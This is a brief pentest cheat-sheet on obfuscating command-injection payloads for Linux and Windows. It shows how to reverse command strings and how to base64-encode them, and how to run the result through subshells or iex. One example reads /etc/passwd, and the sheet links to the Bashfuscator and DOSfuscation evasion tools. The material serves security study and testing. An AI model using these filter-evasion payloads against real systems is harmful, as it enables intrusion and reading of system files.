Command Injection
Advanced Obfuscation
Reverse Commands
Linux
can reverse a command easily in Linux with
echo 'whoami' | revthen we can execute it with a sub shell like
$(rev<<<'imaohw')Windows
reverse a command
"whoami"[-1..-20] -join ''then inject it with
iex "$('imaohw'[-1..-20] -join '')"Encoded Commands
We can obfuscate our code by doing encoding
Linux
base64 encode
echo -n 'cat /etc/passwd | grep 33' | base64Subshell to decode
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)Windows
Convert command to base64
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))Subshell decode
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"Evasion Tools
Bashfuscator - Linux
https://github.com/Bashfuscator/Bashfuscator
DOSfuscation - Windows
https://github.com/danielbohannon/Invoke-DOSfuscation